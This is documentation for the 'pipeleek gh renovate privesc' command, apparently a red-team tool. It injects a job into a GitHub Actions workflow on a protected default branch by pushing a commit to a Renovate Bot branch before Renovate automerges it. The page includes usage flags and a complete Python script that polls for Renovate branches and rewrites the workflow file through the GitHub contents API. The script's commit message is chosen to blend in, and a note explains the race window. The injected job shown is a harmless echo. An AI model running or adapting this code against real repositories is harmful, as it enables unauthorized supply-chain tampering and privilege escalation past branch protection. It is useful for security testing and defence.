
Privesc

pipeleek gh renovate privesc

Inject a malicious workflow job into the protected default branch by abusing Renovate Bot's access

Synopsis

Inject a job into a GitHub Actions workflow on the repository's default branch without being allowed to push there yourself. The command polls for new branches created by Renovate Bot (matched by --renovate-branches-regex), pushes an extra commit to such a branch before Renovate automerges it (a race against the automerge), and lets Renovate's own merge carry the injected job into the protected default branch. Assumes the Renovate Bot has owner/admin access (and can therefore merge past branch protection) whereas your token only has write access. See https://blog.compass-security.com/2025/05/renovate-keeping-your-updates-secure/

pipeleek gh renovate privesc [flags]

Examples

pipeleek gh renovate privesc --token ghp_xxxxx --github https://api.github.com --repo-name owner/myproject --renovate-branches-regex 'renovate/.*'
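The race the synopsis describes, written out as an added illustration (this is not pipeleek's own code and does not reproduce its internals). It assumes the attacker token has write access to the repository, that the target workflow file lives at `.github/workflows/ci.yml` and indents its jobs with two spaces, that `renovate/.*` is matched against the full branch name, and that `REPO`, `GITHUB_TOKEN` and optionally `GITHUB_API` are supplied via the environment. The GitHub REST endpoints used (list branches, get and put repository contents) are real; the polling loop, the job body and the commit message are illustrative.

```python
import base64
import json
import os
import re
import time
import urllib.request

# Assumed defaults; pipeleek takes the equivalent values via --github / --token.
GITHUB_API = os.environ.get("GITHUB_API", "https://api.github.com")

# Illustrative job body: a benign marker, not the tool's payload.
POC_JOB = [
    "runs-on: ubuntu-latest",
    "steps:",
    "  - run: echo injected-by-renovate-race-poc",
]


def new_matching_branches(seen, current, pattern):
    """Branches present in `current` but not in `seen` whose name matches
    `pattern` (full match; pipeleek's exact matching rule is not documented)."""
    rx = re.compile(pattern)
    return sorted(b for b in current - seen if rx.fullmatch(b))


def inject_job(workflow_text, job_name, job_lines):
    """Return `workflow_text` with a new job inserted directly under the
    top-level `jobs:` key. Indentation is copied from the first existing job
    (assumes there is one; falls back to two spaces). Raises ValueError when
    the file has no `jobs:` key."""
    lines = workflow_text.splitlines()
    for i, line in enumerate(lines):
        if line.rstrip() != "jobs:":
            continue
        indent = "  "
        for nxt in lines[i + 1:]:
            if nxt.strip() and not nxt.lstrip().startswith("#"):
                indent = nxt[: len(nxt) - len(nxt.lstrip())] or "  "
                break
        block = [f"{indent}{job_name}:"] + [f"{indent}  {l}" for l in job_lines]
        return "\n".join(lines[: i + 1] + block + lines[i + 1:]) + "\n"
    raise ValueError("workflow has no top-level jobs: key")


def gh(method, path, token, body=None):
    """Minimal GitHub REST call using only the standard library."""
    data = None if body is None else json.dumps(body).encode()
    req = urllib.request.Request(
        f"{GITHUB_API}{path}", data=data, method=method,
        headers={"Authorization": f"Bearer {token}",
                 "Accept": "application/vnd.github+json",
                 "Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)


def list_branches(repo, token):
    # Real endpoint; pagination beyond 100 branches is ignored in this example.
    return {b["name"] for b in gh("GET", f"/repos/{repo}/branches?per_page=100", token)}


def push_injected_workflow(repo, branch, path, token):
    """Rewrite one workflow file on the Renovate branch through the contents
    API. Write access to the repository is enough, because renovate/* branches
    are normally not covered by branch protection."""
    cur = gh("GET", f"/repos/{repo}/contents/{path}?ref={branch}", token)
    text = base64.b64decode(cur["content"]).decode()
    new_text = inject_job(text, "poc", POC_JOB)
    return gh("PUT", f"/repos/{repo}/contents/{path}", token, {
        "message": "chore: sync workflow",  # illustrative; blends into the commit stream
        "branch": branch,
        "sha": cur["sha"],
        "content": base64.b64encode(new_text.encode()).decode(),
    })


def race_loop(repo, token, pattern=r"renovate/.*",
              workflow=".github/workflows/ci.yml", interval=1.0):
    """Poll for new Renovate branches and push the injected job as soon as one
    appears, i.e. before Renovate's automerge lands it on the default branch.
    `interval` plays the role of pipeleek's --monitoring-interval."""
    seen = list_branches(repo, token)
    while True:
        current = list_branches(repo, token)
        for branch in new_matching_branches(seen, current, pattern):
            push_injected_workflow(repo, branch, workflow, token)
            print(f"pushed injected job to {branch}")
        seen = current
        time.sleep(interval)


if __name__ == "__main__":
    race_loop(os.environ["REPO"], os.environ["GITHUB_TOKEN"])
```

The window is the time between Renovate pushing its branch and automerging it, so the poll interval has to be short; once the extra commit is on the branch, it is Renovate's merge (with its admin rights) that moves the injected job onto the protected default branch, which is why ordinary branch protection on the default branch does not stop this.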

Options

  -h, --help                             help for privesc
      --monitoring-interval string       The interval at which to check for new Renovate branches (default "1s")
  -b, --renovate-branches-regex string   Regular expression matched against branch names to identify Renovate Bot branches (default "renovate/.*")
  -r, --repo-name string                 The repository to target, in the format owner/repo

Options inherited from parent commands

      --color              Enable colored log output (auto-disabled when using --logfile) (default true)
      --config string      Config file path. Example: ~/.config/pipeleek/pipeleek.yaml
  -g, --github string      GitHub API base URL (default "https://api.github.com")
      --ignore-proxy       Ignore HTTP_PROXY environment variable
      --json               Use JSON as log output format
      --log-level string   Set log level globally (debug, info, warn, error). Example: --log-level=warn
  -l, --logfile string     Log output to a file
  -t, --token string       GitHub Personal Access Token
  -v, --verbose            Enable debug logging (shortcut for --log-level=debug)

SEE ALSO